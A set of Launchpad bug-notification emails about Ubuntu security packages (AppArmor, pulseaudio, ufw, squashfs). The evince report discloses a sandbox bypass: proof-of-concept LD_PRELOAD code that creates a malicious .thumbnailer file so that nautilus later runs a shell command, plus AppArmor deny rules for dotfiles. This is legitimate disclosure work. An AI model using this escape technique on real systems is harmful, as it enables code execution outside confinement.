[Group.of.nepali.translators] [Bug 1890848] [NEW] 'ptrace trace' needed to readlink() /proc/*/ns/* files
Public bug reported:
Per 'man namespaces':
"Permission to dereference or read (readlink(2)) these symbolic links is
governed by a ptrace access mode PTRACE_MODE_READ_FSCREDS check; see
ptrace(2)."
This suggests that a 'ptrace read' rule should be sufficient to
readlink() /proc/*/ns/*, which is the case with 5.4.0-42.46-generic
(Ubuntu 20.04 LTS).
However, on Ubuntu 18.04 LTS and 16.04 LTS, 'ptrace trace' is needed.
Here is a reproducer:
$ cat ./readlink-ns.c
#include
#include
#include
#include
#include
#include
#include
void usage() {
fprintf(stderr, "Usage: readlink-ns -p -n \n");
}
int main(int argc, char *argv[])
{
pid_t pid = 0;
char *ns = NULL;
char path[PATH_MAX] = {};
char rpath[PATH_MAX] = {};
int c;
while ((c = getopt(argc, argv, "hn:p:")) != -1) {
switch(c) {
case 'n':
ns = optarg;
break;
case 'p':
pid = atoi(optarg);
break;
case 'h':
usage();
return 0;
case '?':
usage();
return 1;
default:
return 1;
}
}
int n = snprintf(path, sizeof(path), "/proc/%d/ns/%s", pid, ns);
if (n < 0 || (size_t)n >= sizeof(path)) {
fprintf(stderr, "cannot format string\n");
return 1;
}
path[n] = '\0';
printf("path: %s\n", path);
n = readlink(path, rpath, sizeof(rpath));
if (n < 0) {
perror("readlink()");
return 1;
} else if (n == sizeof(rpath)) {
fprintf(stderr, "cannot readlink()\n");
return 1;
}
printf("rpath: %s\n", rpath);
return 0;
}
$ cat ./readlink-ns.apparmor
#include
profile test {
#include
# focal
ptrace (read) peer="unconfined",
# xenial, bionic
#ptrace (trace) peer="unconfined",
}
# bionic and xenial need 'ptrace trace'
$ gcc ./readlink-ns.c && sudo apparmor_parser -r ./readlink-ns.apparmor && sudo
aa-exec -p test -- ./a.out -p 1 -n pid
path: /proc/1/ns/pid
readlink(): Permission denied
Denial:
Aug 07 14:40:59 sec-bionic-amd64 kernel: audit: type=1400
audit(1596829259.675:872): apparmor="DENIED" operation="ptrace" profile="test"
pid=1311 comm="a.out" requested_mask="trace" denied_mask="trace"
peer="unconfined"
# focal needs only 'ptrace read'
$ gcc ./readlink-ns.c && sudo apparmor_parser -r ./readlink-ns.apparmor && sudo
aa-exec -p test -- ./a.out -p 1 -n pid
path: /proc/1/ns/pid
rpath: pid:[4026531836]
** Affects: linux (Ubuntu)
Importance: Undecided
Status: Fix Released
** Affects: linux (Ubuntu Xenial)
Importance: Undecided
Status: Confirmed
** Affects: linux (Ubuntu Bionic)
Importance: Undecided
Status: Confirmed
** Tags: apparmor
** Also affects: linux (Ubuntu Bionic)
Importance: Undecided
Status: New
** Also affects: linux (Ubuntu Xenial)
Importance: Undecided
Status: New
** Changed in: linux (Ubuntu)
Status: New => Fix Released
** Tags added: apparmor
** Changed in: linux (Ubuntu Bionic)
Status: New => Confirmed
** Changed in: linux (Ubuntu Xenial)
Status: New => Confirmed
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1890848
Title:
'ptrace trace' needed to readlink() /proc/*/ns/* files
Status in linux package in Ubuntu:
Fix Released
Status in linux source package in Xenial:
Confirmed
Status in linux source package in Bionic:
Confirmed
Bug description:
Per 'man namespaces':
"Permission to dereference or read (readlink(2)) these symbolic links is
governed by a ptrace access mode PTRACE_MODE_READ_FSCREDS check; see
ptrace(2)."
This suggests that a 'ptrace read' rule should be sufficient to
readlink() /proc/*/ns/*, which is the case with 5.4.0-42.46-generic
(Ubuntu 20.04 LTS).
However, on Ubuntu 18.04 LTS and 16.04 LTS, 'ptrace trace' is needed.
Here is a reproducer:
$ cat ./readlink-ns.c
#include
#include
#include
#include
#include
#include
#include
void usage() {
fprintf(stderr, "Usage: readlink-ns -p -n \n");
}
int main(int argc, char *argv[])
{
pid_t pid = 0;
char *ns = NULL;
char path[PATH_MAX] = {};
char rpath[PATH_MAX] = {};
int c;
while ((c = getopt(argc, argv, "hn:p:")) != -1) {
switch(c) {
case 'n':
ns = optarg;
[Group.of.nepali.translators] [Bug 1781428] Re: please enable snap mediation support
** Description changed: + [Impact] + Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. - # Original summary: pulseaudio built with --enable-snappy but 'Enable - Snappy support: no' + To correct this situation but not regress existing behavior, Ubuntu + 19.04's pulseaudio was updated patch to allow playback to all connected + clients (snaps or not), record by classic snaps (see bug 1787324) and + record by strict mode snaps if either the pulseaudio or new-in- + snapd-2.41 audio-record interfaces were connected. With this change, + snapd is in a position to migrate snaps to the new audio-playback and + audio-record interfaces and properly mediate audio recording (see + https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- + deprecation/13418). + + The patch to pulseaudio consists of adding a module, enabling it in + default.pa and then when it is enabled, pulseaudio when faced with a + record operation will, when the connecting process is a snap (ie, its + security label (ie, apparmor label) starts with 'snap.'), query snapd + via its control socket to ask if the snap is classic and if not, whether + the pulseaudio or audio-record interfaces are connected. Adjusting + pulseaudio in the manner does not require coordination with any release + of snapd. It does need a newer version of snapd-glib, which was recently + updated to 1.49 in the last SRU. + + [Test Case] + + Since the pulseaudio mediation behavior triggers when the security label + starts with 'snap.' it is su + + For unconfined applications: + $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" + yes + + $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ paplay /tmp/out.wav && echo "yes" + yes + + For confined, non-snap applications: + $ sudo apt-get install evince + + $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav + && echo yes + + $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" + yes + + + For classic snaps: + $ sudo snap install test-snapd-classic-confinement --classic + + $ snap run --shell test-snapd-classic-confinement + + $ cat /proc/self/attr/current # verify we are classic confined + snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) + + $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" + yes + + $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ paplay /tmp/out.wav && echo "yes" + yes + + For strict snaps with pulseaudio: + $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap + + $ snap connections test-snapd-pulseaudio + Interface Plug Slot Notes + pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - + + $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created + ... + + $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- + pulseaudio/common/ + + $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes + xcb_connection_has_error() returned true + yes + + (note, the xcb_connection_has_error() message is due to the x11 + interface not being connecting which is unrelated to mediation. x11 is + left out to ensure that just audio-playback/audio-record are tested) + + $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass + ... + ^Cyes + + $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes + ... + yes + + + For strict snaps with audio-playback/audio-record: + $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap + + $ snap connections test-snapd-audio-record # record not connected + Interface PlugSlot Notes + audio-playback test-snapd-audio-record:audio-playback :audio-playback - + audio-recordtest-snapd-audio-record:audio-record-- + + $ test-snapd-audio-record.play --help # ensure SNAP dirs are created + ... + + $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- + record/common/ + + $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes + xcb_connection_has_error() returned true + yes + + (note, the xcb_connection_has_error() message is due to the x11 + interface not being connecting which is un
[Group.of.nepali.translators] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy gaps in evince
Ubuntu 14.04 LTS is now out of standard support and evince is not
included in ESM.
** Changed in: evince (Ubuntu Trusty)
Status: In Progress => Won't Fix
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1788929
Title:
Debian/Ubuntu AppArmor policy gaps in evince
Status in AppArmor:
Fix Released
Status in apparmor package in Ubuntu:
Fix Released
Status in evince package in Ubuntu:
Fix Released
Status in apparmor source package in Trusty:
Fix Released
Status in evince source package in Trusty:
Won't Fix
Status in apparmor source package in Xenial:
Fix Released
Status in evince source package in Xenial:
In Progress
Status in apparmor source package in Bionic:
Fix Released
Status in evince source package in Bionic:
In Progress
Status in apparmor source package in Cosmic:
Fix Released
Status in evince source package in Cosmic:
Fix Released
Bug description:
[Note on coordination: I'm reporting this as a security bug to both Ubuntu
(because Ubuntu is where this policy originally comes from, and Ubuntu is also
where AppArmor is most relevant) and Debian (because the AppArmor policy has
been merged into Debian's version of the package). It isn't clear to me who
really counts as upstream here...]
Debian/Ubuntu ship with an AppArmor policy for evince, which, among other
things, restricts evince-thumbnailer. The Ubuntu security team seems to
incorrectly believe that this policy provides meaningful security isolation:
https://twitter.com/alex_murray/status/1032780425834446849
https://twitter.com/alex_murray/status/1032796879640190976
This AppArmor policy seems to be designed to permit everything that
evince-thumbnailer might need; however, it does not seem to be designed to
establish a consistent security boundary around evince-thumbnailer.
For example, read+write access to almost the entire home directory is granted:
/usr/bin/evince-thumbnailer {
[...]
# Lenient, but remember we still have abstractions/private-files-strict in
# effect).
@{HOME}/ r,
owner @{HOME}/** rw,
owner /media/** rw,
}
As the comment notes, a couple files are excluded to prevent you from just
overwriting well-known executable scripts in the user's home directory, like
~/.bashrc:
[...]
# don't allow reading/updating of run control files
deny @{HOME}/.*rc mrk,
audit deny @{HOME}/.*rc wl,
# bash
deny @{HOME}/.bash* mrk,
audit deny @{HOME}/.bash* wl,
deny @{HOME}/.inputrc mrk,
audit deny @{HOME}/.inputrc wl,
[...]
Verification:
user@ubuntu-18-04-vm:~$ cat preload2.c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
__attribute__((constructor)) static void entry(void) {
printf("constructor running from %s\n", program_invocation_name);
int fd = open("/home/user/.bashrc", O_WRONLY);
if (fd != -1) {
printf("success\n");
} else {
perror("open .bashrc");
}
exit(0);
}
user@ubuntu-18-04-vm:~$ sudo gcc -shared -o
/usr/lib/x86_64-linux-gnu/libevil_preload.so preload2.c -fPIC
user@ubuntu-18-04-vm:~$
LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer
constructor running from evince-thumbnailer
open .bashrc: Permission denied
user@ubuntu-18-04-vm:~$ dmesg|tail -n1
[ 6900.355399] audit: type=1400 audit(1535126396.280:113): apparmor="DENIED"
operation="open" profile="/usr/bin/evince-thumbnailer"
name="/home/user/.bashrc" pid=4807 comm="evince-thumbnai" requested_mask="w"
denied_mask="w" fsuid=1000 ouid=1000
But of course blacklists are brittle and often trivially bypassable. For
example, did you know that it is possible to override the system's
thumbnailers
by dropping .thumbnailer files in ~/.local/share/ ? .thumbnailer files contain
command lines that will be executed by nautilus. To demonstrate that it is
possible to create .thumbnailer files from evince-thumbnailer:
user@ubuntu-18-04-vm:~$ ls -la .local/share/thumbnailers/
ls: cannot access '.local/share/thumbnailers/': No such file or directory
user@ubuntu-18-04-vm:~$ cat preload3.c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
__attribute__((constructor)) static void entry(void) {
printf("constructor running from %s\n", program_invocation_name);
if (mkdir("/home/user/.local/share/thumbnailers", 0777) && errno != EEXIST)
err(1, "mkdir");
FILE *f = fopen("/home/user/.local/share/thumbnailers/evil.thumbnailer",
"w");
if (!f)
err(1, "create");
fputs("[Thumbnailer Entry]\n", f);
fputs("Exec=find /etc/passwd -name passwd -exec gnome-terminal -- sh -c
id;cat
[...]
}
As a comment in abstractions/dbus-session explains:
# This a
[Group.of.nepali.translators] [Bug 1726856] Re: ufw does not start automatically at boot
@Matt you have both ufw and firewalld installed and running. You should disable/remove firewalld. Marking this as 'Invalid' for now, but please feel free to report back if you still see a bug in ufw after addressing firewalld. ** Changed in: ufw Status: Incomplete => Invalid ** Changed in: ufw (Ubuntu Disco) Status: Incomplete => Invalid ** Changed in: ufw (Ubuntu Cosmic) Status: Incomplete => Invalid ** Changed in: ufw (Ubuntu Bionic) Status: Incomplete => Invalid ** Changed in: ufw (Ubuntu Xenial) Status: Incomplete => Invalid -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1726856 Title: ufw does not start automatically at boot Status in ufw: Invalid Status in ufw package in Ubuntu: Invalid Status in ufw source package in Xenial: Invalid Status in ufw source package in Bionic: Invalid Status in ufw source package in Cosmic: Invalid Status in ufw source package in Disco: Invalid Bug description: Whenever I boot into 17.10 ufw is always inactive, even though /etc/ufw/ufw.conf has this: # Set to yes to start on boot. If setting this remotely, be sure to add a rule # to allow your remote connection before starting ufw. Eg: 'ufw allow 22/tcp' ENABLED=yes ProblemType: Bug DistroRelease: Ubuntu 17.10 Package: ufw 0.35-5 ProcVersionSignature: Ubuntu 4.13.0-16.19-generic 4.13.4 Uname: Linux 4.13.0-16-generic x86_64 ApportVersion: 2.20.7-0ubuntu3 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 24 13:56:40 2017 InstallationDate: Installed on 2015-04-01 (936 days ago) InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 (20140722.2) PackageArchitecture: all SourcePackage: ufw UpgradeStatus: Upgraded to artful on 2017-10-24 (0 days ago) mtime.conffile..etc.default.ufw: 2015-06-17T22:01:02.089170 To manage notifications about this bug go to: https://bugs.launchpad.net/ufw/+bug/1726856/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1726856] Re: ufw does not start automatically at boot
@Matt, there aren't any errors in your journalctl output that I can see. Without removing the change to /lib/ufw/ufw-init yet, can you reboot until you see the problem, and then before you correct the issue, can you attach the output of all of the following: 1. journalctl --no-pager > /tmp/journal.full 2. dpkg -l > /tmp/dpkg.list 3. sudo tar -zcf /tmp/ufw.tar.gz /lib/ufw/ /etc/default/ufw /etc/ufw/ /usr/share/ufw/ 4. sudo ufw show raw > /tmp/ufw.raw ** Also affects: ufw (Ubuntu Disco) Importance: Undecided Status: New ** Changed in: ufw (Ubuntu Xenial) Status: New => Incomplete ** Changed in: ufw (Ubuntu Bionic) Status: New => Incomplete ** Changed in: ufw (Ubuntu Cosmic) Status: New => Incomplete ** Changed in: ufw (Ubuntu Disco) Status: New => Incomplete -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1726856 Title: ufw does not start automatically at boot Status in ufw: Incomplete Status in ufw package in Ubuntu: Incomplete Status in ufw source package in Xenial: Incomplete Status in ufw source package in Bionic: Incomplete Status in ufw source package in Cosmic: Incomplete Status in ufw source package in Disco: Incomplete Bug description: Whenever I boot into 17.10 ufw is always inactive, even though /etc/ufw/ufw.conf has this: # Set to yes to start on boot. If setting this remotely, be sure to add a rule # to allow your remote connection before starting ufw. Eg: 'ufw allow 22/tcp' ENABLED=yes ProblemType: Bug DistroRelease: Ubuntu 17.10 Package: ufw 0.35-5 ProcVersionSignature: Ubuntu 4.13.0-16.19-generic 4.13.4 Uname: Linux 4.13.0-16-generic x86_64 ApportVersion: 2.20.7-0ubuntu3 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 24 13:56:40 2017 InstallationDate: Installed on 2015-04-01 (936 days ago) InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 (20140722.2) PackageArchitecture: all SourcePackage: ufw UpgradeStatus: Upgraded to artful on 2017-10-24 (0 days ago) mtime.conffile..etc.default.ufw: 2015-06-17T22:01:02.089170 To manage notifications about this bug go to: https://bugs.launchpad.net/ufw/+bug/1726856/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1726856] Re: ufw does not start automatically at boot
For those experiencing this issue, can you adjust /lib/ufw/ufw-init to
use this:
#!/bin/sh -x
on its first line instead of:
#!/bin/sh
Then reboot and until you see the issue. When you do, please use
`journalctl --no-pager --unit=ufw` and attach the results.
Thanks!
** Changed in: ufw
Status: Triaged => Incomplete
** Changed in: ufw
Assignee: Jamie Strandboge (jdstrand) => (unassigned)
** Changed in: ufw (Ubuntu)
Assignee: Jamie Strandboge (jdstrand) => (unassigned)
** Changed in: ufw (Ubuntu Xenial)
Assignee: Jamie Strandboge (jdstrand) => (unassigned)
** Changed in: ufw (Ubuntu Artful)
Assignee: Jamie Strandboge (jdstrand) => (unassigned)
** Changed in: ufw (Ubuntu Bionic)
Assignee: Jamie Strandboge (jdstrand) => (unassigned)
** Changed in: ufw (Ubuntu Cosmic)
Assignee: Jamie Strandboge (jdstrand) => (unassigned)
** No longer affects: ufw (Ubuntu Artful)
** Changed in: ufw (Ubuntu)
Status: Triaged => Incomplete
** Changed in: ufw (Ubuntu Xenial)
Status: Triaged => Incomplete
** Changed in: ufw (Ubuntu Bionic)
Status: Triaged => Incomplete
** Changed in: ufw (Ubuntu Cosmic)
Status: Triaged => New
** Changed in: ufw (Ubuntu Bionic)
Status: Incomplete => New
** Changed in: ufw (Ubuntu Xenial)
Status: Incomplete => New
** Changed in: ufw (Ubuntu)
Status: Incomplete => New
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1726856
Title:
ufw does not start automatically at boot
Status in ufw:
Incomplete
Status in ufw package in Ubuntu:
New
Status in ufw source package in Xenial:
New
Status in ufw source package in Bionic:
New
Status in ufw source package in Cosmic:
New
Bug description:
Whenever I boot into 17.10 ufw is always inactive, even though
/etc/ufw/ufw.conf has this:
# Set to yes to start on boot. If setting this remotely, be sure to add a rule
# to allow your remote connection before starting ufw. Eg: 'ufw allow 22/tcp'
ENABLED=yes
ProblemType: Bug
DistroRelease: Ubuntu 17.10
Package: ufw 0.35-5
ProcVersionSignature: Ubuntu 4.13.0-16.19-generic 4.13.4
Uname: Linux 4.13.0-16-generic x86_64
ApportVersion: 2.20.7-0ubuntu3
Architecture: amd64
CurrentDesktop: ubuntu:GNOME
Date: Tue Oct 24 13:56:40 2017
InstallationDate: Installed on 2015-04-01 (936 days ago)
InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64
(20140722.2)
PackageArchitecture: all
SourcePackage: ufw
UpgradeStatus: Upgraded to artful on 2017-10-24 (0 days ago)
mtime.conffile..etc.default.ufw: 2015-06-17T22:01:02.089170
To manage notifications about this bug go to:
https://bugs.launchpad.net/ufw/+bug/1726856/+subscriptions
___
Mailing list: https://launchpad.net/~group.of.nepali.translators
Post to : group.of.nepali.translators@lists.launchpad.net
Unsubscribe : https://launchpad.net/~group.of.nepali.translators
More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy gaps in evince
I referenced the wrong bug in the evince upload so it didn't auto-close,
but 3.30.0-3ubuntu1 should address this.
** Changed in: evince (Ubuntu Cosmic)
Status: Fix Committed => Fix Released
** Changed in: evince (Ubuntu Trusty)
Status: Triaged => In Progress
** Changed in: evince (Ubuntu Xenial)
Status: Triaged => In Progress
** Changed in: evince (Ubuntu Bionic)
Status: Triaged => In Progress
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1788929
Title:
Debian/Ubuntu AppArmor policy gaps in evince
Status in AppArmor:
Fix Released
Status in apparmor package in Ubuntu:
Fix Released
Status in evince package in Ubuntu:
Fix Released
Status in apparmor source package in Trusty:
Fix Committed
Status in evince source package in Trusty:
In Progress
Status in apparmor source package in Xenial:
Fix Committed
Status in evince source package in Xenial:
In Progress
Status in apparmor source package in Bionic:
Fix Committed
Status in evince source package in Bionic:
In Progress
Status in apparmor source package in Cosmic:
Fix Released
Status in evince source package in Cosmic:
Fix Released
Bug description:
[Note on coordination: I'm reporting this as a security bug to both Ubuntu
(because Ubuntu is where this policy originally comes from, and Ubuntu is also
where AppArmor is most relevant) and Debian (because the AppArmor policy has
been merged into Debian's version of the package). It isn't clear to me who
really counts as upstream here...]
Debian/Ubuntu ship with an AppArmor policy for evince, which, among other
things, restricts evince-thumbnailer. The Ubuntu security team seems to
incorrectly believe that this policy provides meaningful security isolation:
https://twitter.com/alex_murray/status/1032780425834446849
https://twitter.com/alex_murray/status/1032796879640190976
This AppArmor policy seems to be designed to permit everything that
evince-thumbnailer might need; however, it does not seem to be designed to
establish a consistent security boundary around evince-thumbnailer.
For example, read+write access to almost the entire home directory is granted:
/usr/bin/evince-thumbnailer {
[...]
# Lenient, but remember we still have abstractions/private-files-strict in
# effect).
@{HOME}/ r,
owner @{HOME}/** rw,
owner /media/** rw,
}
As the comment notes, a couple files are excluded to prevent you from just
overwriting well-known executable scripts in the user's home directory, like
~/.bashrc:
[...]
# don't allow reading/updating of run control files
deny @{HOME}/.*rc mrk,
audit deny @{HOME}/.*rc wl,
# bash
deny @{HOME}/.bash* mrk,
audit deny @{HOME}/.bash* wl,
deny @{HOME}/.inputrc mrk,
audit deny @{HOME}/.inputrc wl,
[...]
Verification:
user@ubuntu-18-04-vm:~$ cat preload2.c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
__attribute__((constructor)) static void entry(void) {
printf("constructor running from %s\n", program_invocation_name);
int fd = open("/home/user/.bashrc", O_WRONLY);
if (fd != -1) {
printf("success\n");
} else {
perror("open .bashrc");
}
exit(0);
}
user@ubuntu-18-04-vm:~$ sudo gcc -shared -o
/usr/lib/x86_64-linux-gnu/libevil_preload.so preload2.c -fPIC
user@ubuntu-18-04-vm:~$
LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer
constructor running from evince-thumbnailer
open .bashrc: Permission denied
user@ubuntu-18-04-vm:~$ dmesg|tail -n1
[ 6900.355399] audit: type=1400 audit(1535126396.280:113): apparmor="DENIED"
operation="open" profile="/usr/bin/evince-thumbnailer"
name="/home/user/.bashrc" pid=4807 comm="evince-thumbnai" requested_mask="w"
denied_mask="w" fsuid=1000 ouid=1000
But of course blacklists are brittle and often trivially bypassable. For
example, did you know that it is possible to override the system's
thumbnailers
by dropping .thumbnailer files in ~/.local/share/ ? .thumbnailer files contain
command lines that will be executed by nautilus. To demonstrate that it is
possible to create .thumbnailer files from evince-thumbnailer:
user@ubuntu-18-04-vm:~$ ls -la .local/share/thumbnailers/
ls: cannot access '.local/share/thumbnailers/': No such file or directory
user@ubuntu-18-04-vm:~$ cat preload3.c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
__attribute__((constructor)) static void entry(void) {
printf("constructor running from %s\n", program_invocation_name);
if (mkdir("/home/user/.local/share/thumbnailers", 0777) && errno != EEXIST)
err(1, "mkdir");
FILE *f = fopen("/home/user/.local/share/thumbn
[Group.of.nepali.translators] [Bug 1794848] Re: private-files-strict abstraction should also limit access to directories
https://gitlab.com/apparmor/apparmor/merge_requests/203/ was committed upstream. ** Changed in: apparmor Status: In Progress => Fix Released ** Summary changed: - private-files-strict abstraction should also limit access to directories + private-files-strict and user-files abstractions should also limit access to directories -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1794848 Title: private-files-strict and user-files abstractions should also limit access to directories Status in AppArmor: Fix Released Status in apparmor package in Ubuntu: In Progress Status in apparmor source package in Trusty: Triaged Status in apparmor source package in Xenial: Triaged Status in apparmor source package in Bionic: Triaged Status in apparmor source package in Cosmic: In Progress Bug description: This is to track the private-files-strict and user-files portion of https://bugs.launchpad.net/apparmor/+bug/1794820 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1794848/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1794848] [NEW] private-files-strict abstraction should also limit access to directories
Public bug reported: This is to track the private-files-strict and user-files portion of https://bugs.launchpad.net/apparmor/+bug/1794820 ** Affects: apparmor Importance: Undecided Assignee: Jamie Strandboge (jdstrand) Status: Fix Released ** Affects: apparmor (Ubuntu) Importance: Undecided Assignee: Jamie Strandboge (jdstrand) Status: In Progress ** Affects: apparmor (Ubuntu Trusty) Importance: Undecided Assignee: Jamie Strandboge (jdstrand) Status: Triaged ** Affects: apparmor (Ubuntu Xenial) Importance: Undecided Assignee: Jamie Strandboge (jdstrand) Status: Triaged ** Affects: apparmor (Ubuntu Bionic) Importance: Undecided Assignee: Jamie Strandboge (jdstrand) Status: Triaged ** Affects: apparmor (Ubuntu Cosmic) Importance: Undecided Assignee: Jamie Strandboge (jdstrand) Status: In Progress ** Also affects: apparmor (Ubuntu Cosmic) Importance: Undecided Status: New ** Also affects: apparmor (Ubuntu Trusty) Importance: Undecided Status: New ** Also affects: apparmor (Ubuntu Bionic) Importance: Undecided Status: New ** Also affects: apparmor (Ubuntu Xenial) Importance: Undecided Status: New ** Changed in: apparmor (Ubuntu Trusty) Status: New => Triaged ** Changed in: apparmor (Ubuntu Xenial) Status: New => Triaged ** Changed in: apparmor (Ubuntu Bionic) Status: New => Triaged ** Changed in: apparmor (Ubuntu Cosmic) Status: New => Triaged ** Changed in: apparmor (Ubuntu Trusty) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: apparmor (Ubuntu Xenial) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: apparmor (Ubuntu Bionic) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: apparmor (Ubuntu Cosmic) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: apparmor (Ubuntu Cosmic) Status: Triaged => In Progress ** Also affects: apparmor Importance: Undecided Status: New ** Changed in: apparmor Status: New => In Progress ** Changed in: apparmor Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1794848 Title: private-files-strict abstraction should also limit access to directories Status in AppArmor: Fix Released Status in apparmor package in Ubuntu: In Progress Status in apparmor source package in Trusty: Triaged Status in apparmor source package in Xenial: Triaged Status in apparmor source package in Bionic: Triaged Status in apparmor source package in Cosmic: In Progress Bug description: This is to track the private-files-strict and user-files portion of https://bugs.launchpad.net/apparmor/+bug/1794820 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1794848/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1779914] Re: unsquashfs does not preserve sticky bit when run as non-root
** Changed in: squashfs-tools (Ubuntu Cosmic) Status: In Progress => Fix Committed ** Changed in: squashfs-tools (Ubuntu Trusty) Status: Triaged => In Progress ** Changed in: squashfs-tools (Ubuntu Xenial) Status: Triaged => In Progress ** Changed in: squashfs-tools (Ubuntu Bionic) Status: Triaged => In Progress ** Bug watch added: Debian Bug tracker #903085 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=903085 ** Also affects: squashfs-tools (Debian) via https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=903085 Importance: Unknown Status: Unknown -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1779914 Title: unsquashfs does not preserve sticky bit when run as non-root Status in squashfs-tools package in Ubuntu: Fix Committed Status in squashfs-tools source package in Trusty: In Progress Status in squashfs-tools source package in Xenial: In Progress Status in squashfs-tools source package in Bionic: In Progress Status in squashfs-tools source package in Cosmic: Fix Committed Status in squashfs-tools package in Debian: Unknown Bug description: From https://sourceforge.net/p/squashfs/mailman/message/36343213/: "This set is an attempt to preserve the sticky bit when running unsquashfs as a non-root user. My main motivation for these changes is to improve reproducability when doing a sequence of "unsquashfs -> mksquashfs" as a non-root user but I think there's even more value in preserving the sticky bit in the case of a squashfs image containing a world-writable directory filled with files owned by a single user. Dropping the sticky bit could be considered to be a real bug in that scenario." To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/squashfs-tools/+bug/1779914/+subscriptions ___ Mailing list: 